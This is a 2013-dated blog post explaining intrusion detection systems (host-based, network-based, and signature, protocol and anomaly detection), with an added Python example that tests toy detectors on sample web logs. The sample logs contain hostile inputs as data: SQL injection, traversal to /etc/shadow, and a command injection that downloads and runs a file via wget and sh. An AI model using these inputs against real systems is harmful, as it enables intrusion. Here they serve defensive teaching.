Tuesday, November 12, 2013

IDS-Intrusion Detection System and other Odds N Ends

Intrusion Detection Systems (IDS) are an important part of keeping DoD network systems protected. An IDS is a tool that helps identify when system defenses have failed: it monitors for suspicious and malicious activity and raises alerts when suspicious events or anomalies occur. Identifying an intrusion early allows for mitigation and limits the damage done to information systems.

There are many kinds of attackers and attacks that can affect information systems: black hats, hacktivists, script kiddies and crackers on the attacker side, and client-side and server-side attacks on the attack side, to name a few.

Steps to preventing server-side attacks include proper DMZ design, firewalls, and applying patches in a timely manner.

Server Hardening-Server hardening is the process of enhancing server security through a variety of means (removing unneeded services, restricting permissions, keeping patches current), which results in a much more secure server operating environment. With these steps in place, server-side attacks have become less frequent, but they must still be protected against.


Preventing Client Side

Apply frequent patches to all client software, including Windows, Microsoft Office, third-party software such as Adobe Flash and Adobe Reader, and alternate browsers. It is also important to keep anti-virus software up to date, including its definitions database, and a thorough scan should be performed on a regular basis.

There are two types of IDS: host based and network based.

A host-based IDS (HIDS) only monitors the host on which the software is installed. This is helpful for monitoring file system integrity and file permissions, and it can log the specific actions of each person who logs onto the system. HIDS are used to watch for intrusion attempts on critical servers. One drawback of HIDS is that each host reports only on itself, so analyzing intrusion attempts across multiple computers is difficult.

A network-based IDS (NIDS) watches the traffic of an entire network segment, analyzes it for patterns and reports any suspicious activity. A NIDS usually consists of a network appliance (sensor) or a host with a NIC in promiscuous mode. The sensor is placed along a network segment or boundary and monitors all traffic on that segment.

There are three types of network IDS.

Signature Based-monitors packets and compares them against predetermined signatures or "attack patterns". A signature-based system cannot detect attacks for which it has no signature.

Protocol Based-monitors the dynamic behavior and state of the protocol. It typically consists of a system or agent that sits at the front end of a server, monitoring and analyzing the communication between a connected device and the system it is protecting.

Anomaly Based-a normal baseline is determined and set. Anything outside this "baseline" is considered an anomaly and therefore a possible attack. Anomaly-based IDS report a higher rate of false alarms.
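As an added example (not code from the original post) of the three detection styles side by side, the Python below runs a signature engine, a minimal protocol check and an anomaly engine over constructed web access-log lines. The signature engine only knows two patterns; the anomaly engine learns the mean and standard deviation of URI length from clean traffic and flags requests more than three standard deviations out; the protocol check is a deliberately simple stand-in (allowed methods, well-formed URI) for real protocol state tracking. The log lines, IP addresses (203.0.113.9 is from the documentation range) and rules are all made up for illustration. The sample shows the two trade-offs the text describes: a command-injection request with no signature is missed by the signature engine but caught by the anomaly engine, and a long but harmless request is a false alarm for the anomaly engine.

```python
import re
import statistics
from typing import Dict, List, Tuple

# Constructed access-log samples (not real traffic): "<src-ip> <method> <uri>"
BASELINE_LOG = [  # clean traffic used to learn the anomaly baseline
    "10.0.0.5 GET /index.html",
    "10.0.0.5 GET /about.html",
    "10.0.0.7 GET /products?id=12",
    "10.0.0.7 GET /products?id=13",
    "10.0.0.9 GET /images/logo.png",
    "10.0.0.9 GET /contact.html",
    "10.0.0.5 GET /products?id=7",
    "10.0.0.7 GET /login",
]
LIVE_LOG = [  # traffic to be inspected
    "10.0.0.5 GET /index.html",                                  # benign
    "10.0.0.9 GET /products?id=1' OR '1'='1",                    # SQL injection (signature exists)
    "10.0.0.9 GET /../../../../../etc/shadow",                   # traversal (signature exists)
    "10.0.0.3 GET /products?id=1;wget%20http://203.0.113.9/x%20-O%20/tmp/x;sh%20/tmp/x",  # command injection, no signature
    "10.0.0.7 GET /reports/annual/2013/q3/summary/department/engineering.pdf",           # benign but unusually long
    "10.0.0.3 HACK /index.html",                                 # protocol violation: unknown method
]

# Signature engine: known attack patterns only (assumed rules).
SIGNATURES = {
    "sql_injection": re.compile(r"'\s*(or|and)\s*'", re.IGNORECASE),
    "path_traversal": re.compile(r"(\.\./){2,}"),
}

# Protocol engine: a minimal stand-in for checking protocol state.
ALLOWED_METHODS = {"GET", "HEAD", "POST"}


def parse(line: str) -> Tuple[str, str, str]:
    """Split a log line into (source, method, uri); the URI may contain spaces."""
    src, method, uri = line.split(" ", 2)
    return src, method, uri


def signature_matches(uri: str) -> List[str]:
    """Names of every signature that fires on the URI."""
    return [name for name, rx in SIGNATURES.items() if rx.search(uri)]


def protocol_violations(method: str, uri: str) -> List[str]:
    """Requests that do not conform to the expected shape of the protocol."""
    issues = []
    if method not in ALLOWED_METHODS:
        issues.append("unknown_method")
    if not uri.startswith("/"):
        issues.append("malformed_uri")
    return issues


class UriLengthBaseline:
    """Anomaly engine: learn mean/stdev of URI length from clean traffic, flag outliers."""

    def __init__(self, lengths: List[int], z_threshold: float = 3.0):
        self.mean = statistics.mean(lengths)
        self.stdev = statistics.stdev(lengths)
        self.z_threshold = z_threshold

    def z_score(self, uri: str) -> float:
        return (len(uri) - self.mean) / self.stdev

    def is_anomalous(self, uri: str) -> bool:
        return self.z_score(uri) > self.z_threshold


def analyze(baseline_log: List[str], live_log: List[str], z_threshold: float = 3.0) -> List[Dict]:
    """Run all three engines over live_log; one verdict record per line."""
    baseline = UriLengthBaseline([len(parse(l)[2]) for l in baseline_log], z_threshold)
    results = []
    for line in live_log:
        src, method, uri = parse(line)
        results.append({
            "src": src,
            "uri": uri,
            "signature": signature_matches(uri),
            "protocol": protocol_violations(method, uri),
            "anomaly": baseline.is_anomalous(uri),
            "z": round(baseline.z_score(uri), 2),
        })
    return results


if __name__ == "__main__":
    for record in analyze(BASELINE_LOG, LIVE_LOG):
        print(record)
```

Tuning the z-score threshold moves the anomaly engine along the trade-off the text mentions: a lower threshold catches more novel attacks at the cost of more false alarms, and a higher one does the opposite.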

When using any type of IDS it is important to know the shortcomings of each type and be prepared to handle any threat. It is important to use HIDS along with NIDS so that an intrusion one of them misses is caught by the other. The two types work hand in hand to protect the clients, hosts, servers and internal network from malicious activity.
